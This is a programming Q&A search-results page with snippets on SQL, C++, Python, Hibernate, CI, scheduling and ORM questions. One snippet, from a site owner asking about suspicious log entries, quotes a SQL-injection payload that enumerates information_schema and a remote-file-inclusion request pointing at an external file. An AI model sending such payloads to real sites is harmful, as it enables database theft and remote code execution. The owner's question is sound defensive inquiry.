Search Results

Search found 3292 results on 132 pages for 'nhibernate statistics'.


  • MySQL: filling empty fields with zeroes when using GROUP BY

    - by SaltLake
    I've got a MySQL table:

        CREATE TABLE cms_webstat (
            ID int NOT NULL auto_increment PRIMARY KEY,
            TIMESTAMP_X timestamp DEFAULT CURRENT_TIMESTAMP
            # ... some other fields ...
        )

    which contains statistics about site visitors. To get visits per hour I use:

        SELECT hour(TIMESTAMP_X) AS HOUR, count(*) AS HOUR_STAT
        FROM cms_webstat
        GROUP BY HOUR
        ORDER BY HOUR DESC

    which gives me:

        | HOUR | HOUR_STAT |
        | 24 | 15 |
        | 23 | 12 |
        | 22 | 9 |
        | 20 | 3 |
        | 18 | 2 |
        | 15 | 1 |
        | 12 | 3 |
        | 9 | 1 |
        | 3 | 5 |
        | 2 | 7 |
        | 1 | 9 |
        | 0 | 12 |

    And I'd like to get the following:

        | HOUR | HOUR_STAT |
        | 24 | 15 |
        | 23 | 12 |
        | 22 | 9 |
        | 21 | 0 |
        | 20 | 3 |
        | 19 | 0 |
        | 18 | 2 |
        | 17 | 0 |
        | 16 | 0 |
        | 15 | 1 |
        | 14 | 0 |
        | 13 | 0 |
        | 12 | 3 |
        | 11 | 0 |
        | 10 | 0 |
        | 9 | 1 |
        | 8 | 0 |
        | 7 | 0 |
        | 6 | 0 |
        | 5 | 0 |
        | 4 | 0 |
        | 3 | 5 |
        | 2 | 7 |
        | 1 | 9 |
        | 0 | 12 |

    How should I modify the query to get such a result? Thanks.
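    A common pure-SQL trick is to LEFT JOIN the aggregate against a table that lists every hour, but the zero-filling is also easy to do in application code after the GROUP BY. A minimal sketch in Python (the table and column names come from the question; the MySQLdb driver and connection settings are assumptions):

        import MySQLdb  # assumed DB-API driver; any DB-API module works the same way

        conn = MySQLdb.connect(db="mydb")  # hypothetical connection settings
        cur = conn.cursor()
        cur.execute(
            "SELECT hour(TIMESTAMP_X) AS HOUR, count(*) AS HOUR_STAT "
            "FROM cms_webstat GROUP BY HOUR"
        )

        # start every hour of the day at 0, then overwrite the hours that had visits
        stats = {h: 0 for h in range(24)}
        for hour, count in cur.fetchall():
            stats[hour] = count

        for hour in sorted(stats, reverse=True):
            print("| %2d | %d |" % (hour, stats[hour]))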

  • C++ option/long option implementation

    - by K Hein
    I am working on a parser for a meta-programming language, using C++ on Linux. Right now I need to implement options/long options for the parser to provide some additional features. Basically, if the user passes in an additional option, the parser needs to store statistics while parsing the text files. I can think of two ways to implement it. One is to use a global to store the options entered by the user. Another is to create a singleton class to store them. So I would like to know if there is any other way to implement it. What is the best/most recommended way of implementing it? Thanks in advance. Regards, K.Hein
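    Besides a global or a singleton, a third route is to parse the options once into a plain options object and hand it to whatever needs it (dependency injection). A rough sketch of that shape, in Python for brevity since the structure carries over to C++ (all names here are hypothetical):

        import argparse

        def parse_options(argv):
            # getopt_long-style short and long options
            parser = argparse.ArgumentParser(prog="metaparse")
            parser.add_argument("-s", "--stats", action="store_true",
                                help="collect statistics while parsing")
            parser.add_argument("files", nargs="+")
            return parser.parse_args(argv)

        class Parser:
            def __init__(self, options):
                self.options = options  # injected, not global

            def parse(self, path):
                if self.options.stats:
                    pass  # update statistics here
                # ... actual parsing ...

        opts = parse_options(["--stats", "input.mp"])
        Parser(opts).parse(opts.files[0])

    The win over a global or singleton is testability: each test can build its own options object without touching shared state.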

  • Compute mean in Python for a generator

    - by nmaxwell
    Hi, I'm doing some statistics work. I have a (large) collection of random numbers to compute the mean of, and I'd like to work with generators, because I just need to compute the mean, so I don't need to store the numbers. The problem is that numpy.mean breaks if you pass it a generator. I can write a simple function to do what I want, but I'm wondering if there's a proper, built-in way to do this? It would be nice if I could say "sum(values)/len(values)", but len doesn't work for generators, and sum has already consumed values. Here's an example:

        import numpy

        def my_mean(values):
            n = 0
            Sum = 0.0
            try:
                while True:
                    Sum += next(values)
                    n += 1
            except StopIteration:
                pass
            return float(Sum)/n

        X = [k for k in range(1,7)]
        Y = (k for k in range(1,7))
        print numpy.mean(X)
        print my_mean(Y)

    These both give the same, correct answer, but my_mean doesn't work for lists, and numpy.mean doesn't work for generators. I really like the idea of working with generators, but details like this seem to spoil things. Thanks for any help. -nick
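    For what it's worth, a plain for loop already works for any iterable, list or generator alike, and on Python 3.4+ the standard library's statistics.mean accepts generators too. A tiny sketch of the loop version:

        def mean(values):
            # works for any iterable: list, tuple, or generator
            n, total = 0, 0.0
            for v in values:
                total += v
                n += 1
            return total / n

        print(mean([k for k in range(1, 7)]))  # 3.5
        print(mean(k for k in range(1, 7)))    # 3.5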

  • Passing parameters to DAO methods to fetch entities in the most efficient way for read-only access

    - by Blankman
    A lot of my use of Hibernate, at least for data that is presented on many parts of the web application, is for read-only purposes. I want to add some parameters to my DAO methods so I can modify the way Hibernate pulls the data and how it handles transactions, etc. Example usage: data on the front page of my website is displayed to the users; it is read-only, so I want to avoid any session/entity tracking that Hibernate usually does. This is data that is read-only, will not be changed in this transaction, etc. What would be the most performant way to pull the data? (The code below is C#/NHibernate; I'm implementing this in Java as I learn it.)

        public IList<Article> GetArticles() {
            return Session.CreateCriteria(typeof(Article))
            // some where clause
        }

  • Best way to collect and store data daily?

    - by mktb
    I have a bunch of statistics: number of users, number of families, ratio of users to families, etc. I'd like to store these daily so I can view the data historically. However, I'm looking for the most effective way to store it. Should I run a cron job that writes one row per day to the database, like

        DATE: today | USERS: 123 | FAMILIES: 456 | RATIO: 7.89

    or whatever? Or should I write multiple rows, like

        DATE: today | DATATYPE: users | VALUE: 123

    Or is there another option I can use that is more efficient or more effective? Thanks!
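    For what it's worth, the one-row-per-metric shape keeps the schema stable as new statistics appear. A small sketch of the idea using sqlite3 (the schema and names are purely illustrative):

        import sqlite3
        from datetime import date

        conn = sqlite3.connect("stats.db")
        conn.execute("""
            CREATE TABLE IF NOT EXISTS daily_stats (
                stat_date TEXT NOT NULL,
                metric    TEXT NOT NULL,
                value     REAL NOT NULL,
                PRIMARY KEY (stat_date, metric)
            )
        """)

        # what the nightly cron job would record
        today = date.today().isoformat()
        for metric, value in [("users", 123), ("families", 456), ("ratio", 7.89)]:
            conn.execute(
                "INSERT OR REPLACE INTO daily_stats VALUES (?, ?, ?)",
                (today, metric, value),
            )
        conn.commit()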

  • Integrating Hudson with MS Test?

    - by hangy
    Is it possible to integrate Hudson with MS Test? I am setting up a small CI server on my development machine with Hudson right now, just so that I can have some statistics (e.g. FxCop and compiler warnings). Of course, it would also be nice if it could just run my unit tests and present their output. Up to now, I have added the following batch task to Hudson, which makes it run the tests properly:

        "%PROGRAMFILES%\Microsoft Visual Studio 9.0\Common7\IDE\MSTest.exe" /runconfig:LocalTestRun.testrunconfig /testcontainer:Tests\bin\Debug\Tests.dll

    However, as far as I know, Hudson does not yet support analysis of MS Test results. Does anyone know whether the TRX files generated by MSTest.exe can be transformed to the JUnit or NUnit result format (because those are supported by Hudson), or whether there is any other way to integrate MS Test unit tests with Hudson?
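    TRX is plain XML, so a transform is certainly feasible. Below is a rough Python sketch of the flattening; the TRX element, attribute, and namespace names are assumptions based on inspecting one MSTest output file rather than a schema reference, so verify them against your own TRX files:

        import xml.etree.ElementTree as ET

        # namespace varies by Visual Studio version; adjust to match your files
        TRX_NS = "{http://microsoft.com/schemas/VisualStudio/TeamTest/2006}"

        def trx_to_junit(trx_path, junit_path):
            root = ET.parse(trx_path).getroot()
            suite = ET.Element("testsuite", name="MSTest")
            tests = failures = 0
            for r in root.iter(TRX_NS + "UnitTestResult"):
                tests += 1
                case = ET.SubElement(suite, "testcase",
                                     name=r.get("testName", "unknown"))
                if r.get("outcome") != "Passed":
                    failures += 1
                    ET.SubElement(case, "failure",
                                  message=r.get("outcome", "Failed"))
            suite.set("tests", str(tests))
            suite.set("failures", str(failures))
            ET.ElementTree(suite).write(junit_path, xml_declaration=True)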

  • Load balancing and scheduling algorithms

    - by Lukas Šalkauskas
    Hello there, so here is my problem: I have several servers with different configurations. I have different calculations (jobs); I can predict approximately how long each job will take to be calculated. Also, I have priorities. My question is how to keep all machines loaded at 99-100% and schedule the jobs in the best way. Each machine can do several calculations at a time. Jobs are pushed to the machines. The central machine knows the current load of each machine. Also, I would like to apply some kind of machine learning here, because I will know statistics about each job (started, finished, CPU load, etc.). How can I distribute jobs (calculations) in the best possible way, keeping in mind the priorities? Any suggestions, ideas, or algorithms? FYI: my platform is .NET.
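    Before reaching for machine learning, a greedy heuristic is a common baseline: order jobs by priority and predicted length, then always hand the next job to the least-loaded machine. A minimal sketch (it ignores per-machine concurrency limits; the job and machine shapes are made up):

        import heapq

        def schedule(jobs, n_machines):
            """jobs: list of (priority, predicted_seconds); higher priority first.
            Returns a list of per-machine job lists."""
            # highest priority first, longest job first within a priority
            ordered = sorted(jobs, key=lambda j: (-j[0], -j[1]))
            # heap of (current_load, machine_index)
            heap = [(0.0, m) for m in range(n_machines)]
            assignment = [[] for _ in range(n_machines)]
            for prio, length in ordered:
                load, m = heapq.heappop(heap)  # least-loaded machine
                assignment[m].append((prio, length))
                heapq.heappush(heap, (load + length, m))
            return assignment

        print(schedule([(1, 30), (2, 10), (1, 50), (3, 5)], n_machines=2))

    The statistics you plan to collect (predicted vs. actual runtimes) slot in naturally here as corrections to the predicted lengths.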

  • Parallel Haskell in order to find the divisors of a huge number

    - by Dragno
    I have written the following program using Parallel Haskell to find the divisors of 1 billion:

        import Control.Parallel

        parfindDivisors :: Integer -> [Integer]
        parfindDivisors n = f1 `par` (f2 `par` (f1 ++ f2))
            where f1 = filter g [1..(quot n 4)]
                  f2 = filter g [(quot n 4)+1..(quot n 2)]
                  g z = n `rem` z == 0

        main = print (parfindDivisors 1000000000)

    I compiled the program with

        ghc -rtsopts -threaded findDivisors.hs

    and I run it with:

        findDivisors.exe +RTS -s -N2 -RTS

    I found a 50% speedup compared to the simple version, which is this:

        findDivisors :: Integer -> [Integer]
        findDivisors n = filter g [1..(quot n 2)]
            where g z = n `rem` z == 0

    My processor is an Intel Core 2 Duo. I was wondering if there can be any improvement in the above code, because the statistics that the program prints say:

        Parallel GC work balance: 1.01 (16940708 / 16772868, ideal 2)

    and

        SPARKS: 2 (1 converted, 0 overflowed, 0 dud, 0 GC'd, 1 fizzled)

    What are these converted, overflowed, dud, GC'd, and fizzled, and how can they help to improve the time?

  • What's The Best Object-Relational Mapping Tool For .NET?

    - by Icono123
    I've worked on a few Java web projects and we've always used Hibernate for our data object layer. I haven't worked on a large scale ASP.NET site and I'm unsure which solution to choose. I'm tempted to try NHibernate, but I don't like the fact that they use so many third party libraries. I found this list on Wikipedia of available ORM software: http://en.wikipedia.org/wiki/List_of_object-relational_mapping_software#.NET What ORM have you used? Was it easy to use? Would you recommend using it again? Was it used on a small, medium, or large project? Would you write your own? Thanks.

  • Incremental compilation in Eclipse: ASTNodes and SVN versioning

    - by Alex
    Hi there, I am building up some statistics after analyzing source code in Eclipse, but the overall process is too slow because I rebuild my model from scratch after each compilation. I am looking for a way to get only the changed parts of the code (as ASTNodes) and to rebuild just that part of my model. I suppose that even the changed compilation units, rather than the exact code elements, would be enough after the user compiles, and that would still be a nice optimization. I am sure Eclipse is capable of knowing which code elements have changed (and even of knowing their semantics), because when I use the Subclipse plugin my changes are ordered by code element (an import, a method, a variable declaration, etc.). Well... at least that plugin is capable of knowing that info. Thanks in advance.

  • Efficient alternatives to merge for larger data.frames in R

    - by Etienne Low-Décarie
    I am looking for an efficient (both computer-resource-wise and learning/implementation-wise) method to merge two larger (size 1 million / 300 KB RData file) data frames. "merge" in base R and "join" in plyr appear to use up all my memory, effectively crashing my system.

    Example: load the test data frame and try

        test.merged <- merge(test, test)

    or

        test.merged <- join(test, test, type="all")

    The following post provides a list of merge and alternatives: How to join data frames in R (inner, outer, left, right)? The following allows object size inspection: https://heuristically.wordpress.com/2010/01/04/r-memory-usage-statistics-variable/

    Data produced by anonym.

  • Popular open source projects using Zend Framework

    - by Alexander
    Hello, I am trying to find an open source project based on Zend Framework: something well written and as popular as Wordpress or Drupal, so I can see the actual benefits of ZF and possibly use it as an example. The only 'showcase' I managed to find is http://framework.zend.com/wiki/pages/viewpage.action?pageId=14134, but this list looks confusing for the 'official' PHP framework. The same goes for ZF's statistics by the numbers (http://framework.zend.com/about/numbers): 10 million downloads against 400 actual projects, which is less than the 500 examples in the user guide... Also, Yahoo chose Symfony for their bookmarks service, not ZF... Am I missing something? Thank you!

  • Taming a fat web service in .NET 3.5 / C#

    - by Chris M
    I'm dealing with an obese third-party web service that returns about 3 MB of data for a simple search result; about 50% of the data in that response is junk. Would it make sense to remap this data to my own result object and ditch the response, so I'm storing 1-2 MB in memory for filtering and sorting rather than using the web response's own object and using 2-4 MB, or am I missing a point? So far I've been accessing the web service from a separate project and using a new class to provide the interaction and handle the persistence, so my project looks like this:

        |- Web (mvc2 proj)
        |- DAL (database/storage fluent-nhibernate)
        |- SVCGateway (interaction layer + webservice related models)
        |- Services
        --------------
        |- Tests
        |- Specs

    I'm trying to make the application feel fast, and I also need to store the result set temporarily in case a customer goes to view a product and wants to go back to the results. (The service returns only 500 of a possible 14K results.) So basically I'm looking for confirmation that I'm doing the right thing in pushing the results into my own objects, or whether I'm breaking some rule, or even whether there's a better way of handling it. Thanks
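    The remapping itself can be very small; a schematic sketch of copying just the needed fields out of the fat response so the rest becomes garbage-collectable (in Python for brevity; the field names are hypothetical):

        from dataclasses import dataclass

        @dataclass
        class SearchResult:
            # only the ~50% of the payload the UI actually needs
            product_id: str
            title: str
            price: float

        def slim_down(raw_results):
            # raw_results: the deserialized 3 MB web-service response;
            # keep our own objects and drop the original so it can be collected
            return [SearchResult(r["id"], r["title"], r["price"])
                    for r in raw_results]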

  • BufferedReader ready method in a while loop to determine EOF?

    - by BobTurbo
    I have a large file (the Wikipedia English articles-only database as an XML file) which I am reading one character at a time using BufferedReader. The pseudo-code is:

        file = BufferedReader...
        while (file.ready())
            character = file.read()

    Is this actually valid? Or will ready just return false when it is waiting for the HDD to return data, and not only when the EOF has been reached? I tried to use if (file.read() == -1) but seemed to run into an infinite loop that I literally could not find. I am just wondering if it is reading the whole file, as my statistics say 444,380 Wikipedia pages have been read, but I thought there were many more articles.

  • Get local network interface addresses using only proc?

    - by Matt Joiner
    How can I obtain the (IPv4) addresses for all network interfaces using only proc? After some extensive investigation I've discovered the following:

    - ifconfig makes use of SIOCGIFADDR, which requires open sockets and advance knowledge of all the interface names. It also isn't documented in any manual pages on Linux.
    - proc contains /proc/net/dev, but this is a list of interface statistics.
    - proc contains /proc/net/if_inet6, which is exactly what I need, but for IPv6.
    - Generally, interfaces are easy to find in proc, but actual addresses are very rarely used except where explicitly part of some connection.
    - There's a system call named getifaddrs, which is very much a "magical" function you'd expect to see in Windows. It's also implemented on BSD. However it's not very text-oriented, which makes it difficult to use from non-C languages.
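    For completeness: interface names can be scraped from /proc/net/dev and the per-interface IPv4 address fetched with the SIOCGIFADDR ioctl, which sidesteps needing the names in advance. A Linux-only sketch in Python (0x8915 is SIOCGIFADDR from <linux/sockios.h>):

        import fcntl
        import socket
        import struct

        SIOCGIFADDR = 0x8915  # from <linux/sockios.h>

        def iface_names():
            # interface names are the first column of /proc/net/dev
            with open("/proc/net/dev") as f:
                return [line.split(":")[0].strip() for line in f if ":" in line]

        def ipv4_addr(ifname):
            s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
            try:
                # ifreq layout: 16-byte name, then sockaddr; IPv4 bytes sit at 20..24
                packed = fcntl.ioctl(s.fileno(), SIOCGIFADDR,
                                     struct.pack("256s", ifname[:15].encode()))
                return socket.inet_ntoa(packed[20:24])
            except OSError:
                return None  # interface has no IPv4 address assigned
            finally:
                s.close()

        for name in iface_names():
            print(name, ipv4_addr(name))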

  • C++ math evaluating incorrectly

    - by Hayden
    I thought I could make life a little easier in data statistics by making a small program which returns the results of a sampling distribution of the mean (with standard error). It does this part successfully, but in an attempt to return the z-score using the formula I found here, it returns -1#IND. My interpretation of that formula is:

        ((1/(sqrt(2*pi)*stdev)) * pow(e, normalpow))

    where

        double normalpow = -0.5*((mean-popmean)*(mean-popmean)/stdev);

    I did a little more investigating and found that (mean-popmean)*(mean-popmean) was evaluating to 0 no matter what. How can I get around this problem of normalpow evaluating to 0?
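    For reference, the normal density that formula describes divides by the variance (stdev squared) in the exponent, not by stdev, and mixing integer operands can silently truncate intermediates to 0. A small all-floating-point reference implementation (in Python for brevity):

        import math

        def normal_pdf(x, mu, sigma):
            # the exponent divides by the variance (sigma**2), not by sigma,
            # and every operand stays floating point so nothing truncates to 0
            coeff = 1.0 / (sigma * math.sqrt(2.0 * math.pi))
            return coeff * math.exp(-((x - mu) ** 2) / (2.0 * sigma ** 2))

        print(normal_pdf(0.5, 0.0, 1.0))  # ~0.3521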

  • Entity Framework projections

    - by David McClelland
    We are investigating the Entity Framework to see if it will meet our particular needs. Here is the scenario I am interested in: I have a large table (let's call it VeryWideRecord) which has many columns, and it has a corresponding business object (also called VeryWideRecord). I would like to be able to query my database for a VeryWideRecord business object, but have the underlying SQL return values for only certain columns. Can I do this with the Entity Framework? I am uncertain whether this could be done with the Entity Framework's table-splitting feature, because the application needs to be able to change the requested columns at runtime. The reason for this is that we are trying to minimize the amount of information going across the wire. I can see how this could be done using NHibernate (example), but how can I do it with the Entity Framework?

  • Is this an injection attempt or a normal request?

    - by CheeseConQueso
    In cPanel's Analog Stats statistics module, I've noticed countless requests to connect to the following example:

        /?x=19&y=15

    The numbers are random, but it's always setting x and y variables. Another category of mysterious requests:

        /?id=http://nic.bupt.edu.cn/media/j1.txt??

    There are other attempts at injection in the request log that have straight SQL written into them as well. Example:

        /jobs/jobinfo.php?id=-999.9 UNION ALL SELECT 1,(SELECT concat(0x7e,0x27,count(table_name),0x27,0x7e) FROM information_schema.tables WHERE table_schema=0x73636363726F6F745F7075626C6963),3,4,5,6,7,8,9,10,11,12,13--

    It looks like they are all reaching a 404, but I'm still wondering about the intent behind them. I know this is vague, but maybe someone knows whether this is normal while using cPanel and phpMyAdmin services. Also, there was a search box installed on the site, which could be the reason. Any suggestions as to what all these are?

  • SAS (Statistical Analysis System) career as a computer science student

    - by Renju
    Hi. I completed an MSc in Computer Science this academic year, so I am a fresher. During my graduation and post-graduation I did many projects using PHP and MySQL. Now I have the opportunity to get into a SAS (Statistical Analysis System) career, and I have heard that SAS offers better career growth than PHP development. For the past 4 days I have been working with SAS and I find the work interesting. My questions are:

    - Since I am a computer science student, will I have any problem with my career growth in SAS?
    - I am ready to learn statistics as well; is there anything else I have to do?
    - Will doing a certification in SAS make any difference?
    - Is it a bad idea to get into SAS with only a CS background?

    Please guide me on my career...

  • Less Mathematical Approaches to Machine Learning?

    - by Ed
    Out of curiosity, I've been reading up a bit on the field of machine learning, and I'm surprised at the amount of computation and mathematics involved. One book I'm reading through uses advanced concepts such as ring theory and PDEs (note: the only thing I know about PDEs is that they use that funny-looking character). This strikes me as odd, considering that mathematics itself is a hard thing to "learn". Are there any branches of machine learning that use different approaches? I would think that approaches relying more on logic, memory, construction of unfounded assumptions, and over-generalization would be a better way to go, since that seems more like the way animals think. Animals don't (explicitly) calculate probabilities and statistics, at least as far as I know.

  • Data driven charts and graphs from xml to svg

    - by garymlewis
    I asked this question a week ago but did not do a good job of describing the problem. Here's a second attempt. I'd like to produce data-driven charts, graphs, and other data visualizations, starting with data in an XML database and ending up with the visualizations as SVG. Here's an example from the W3C: it uses JavaScript to create a stacked bar chart as SVG from XML. I'd like to do something similar, but use a graphics library (or ???) instead of JS to handle the construction of axes, labels, titles, data points, etc. My question, then: what are the options I should consider? Things like Raphael, I suppose, but initially I'd like to cast a wide net and look at many different options. My experience is all with static data visualizations using statistics packages like R, but eventually I'd like to create interactive data visualizations with html5/css3/svg. Any help would be much appreciated. Thanks.
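    As a feel for how little machinery the SVG end of this needs, here is a toy Python sketch that turns a data series into a standalone bar-chart SVG (just the data-driven part; no axes, labels, or titles):

        def bar_chart_svg(data, bar_w=40, gap=10, height=200):
            """Render a list of numbers as an SVG bar chart string."""
            scale = height / max(data)
            bars = []
            for i, v in enumerate(data):
                h = v * scale
                bars.append(
                    '<rect x="{}" y="{}" width="{}" height="{}" fill="steelblue"/>'
                    .format(i * (bar_w + gap), height - h, bar_w, h))
            width = len(data) * (bar_w + gap)
            return ('<svg xmlns="http://www.w3.org/2000/svg" '
                    'width="{}" height="{}">{}</svg>'
                    .format(width, height, "".join(bars)))

        with open("chart.svg", "w") as f:
            f.write(bar_chart_svg([4, 8, 15, 16, 23, 42]))

    A library earns its keep once axes, ticks, and labels come in; the raw SVG part is the easy half.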

  • Copy of Access mdb database being updated by live database

    - by James
    I'm trying to compute statistics for data held in an Access .mdb database. In order to avoid interfering with the live database, I'm working from a copy which I made by simply using copy-paste in Windows Explorer. The copy resides in the same directory, but with a different name. I'm using R and RODBC to connect to the copy of the file. The strange thing is that new data that is being updated on the original live database is appearing in my queries. This is despite the file timestamps of the copy not changing at all. It is also causing some slowdown in the live database. My understanding is that the .mdb files are standalone, or is this not the case? Should I have copied the database in a different way?

  • Using the MySql ASP.NET membership provider with existing users

    - by ScottBelchak
    I have been tasked with migrating an existing mature ASP.NET 2.0 web site to NHibernate, Mono, and MySQL or Postgres. I am somewhat confused as to how the membership provider salts the passwords. If I make the switch and use the MySQL membership provider (outlined in this question) or AspSqlProvider, will the existing users be able to log in? I guess it would be easier for me to ask: how the hell do I get access to the encryption key used by the ASP.NET membership provider to salt the passwords, so that I can use the same one in a third-party provider?

  • How to analyse Wikipedia's article database with R?

    - by Tal Galili
    Hi all, this is a "big" question that I don't know how to start, so I hope some of you can give me a direction. And if this is not a "good" question, I will close the thread with an apology. I wish to go through the database of Wikipedia (let's say the English one) and do statistics. For example, I am interested in how many active editors (which should be defined) Wikipedia had at each point in time (let's say over the last 2 years). I don't know how to build such a database, how to access it, how to know which types of data it has, and so on. So my questions are:

    - What tools do I need for this (besides basic R)? MySQL on my computer? An RODBC database connection?
    - How do you start planning such a project?

  • Web and stand-alone app development tendencies

    - by Narek
    There is a strong tendency toward web apps, and it even seems that very soon a lot of features will be available online, so that for everyday use people will have all the necessary software free online and will not need to install any software locally. Only specific (professional) tools that people don't usually use at home will not be available as web apps. So my question: how do you imagine selling software that was necessary for everyday use and was not free? (It seems vendors can't make money any more by selling such products: there is no need for them.) And what disadvantages do web apps have; that is to say, what is bad about using software online compared with having the same software locally (please list)? Please do not consider this question unconnected with programming, as I really would like to gather a little statistics from professional programmers who are aware of today's tendencies in software and programming. Thanks.
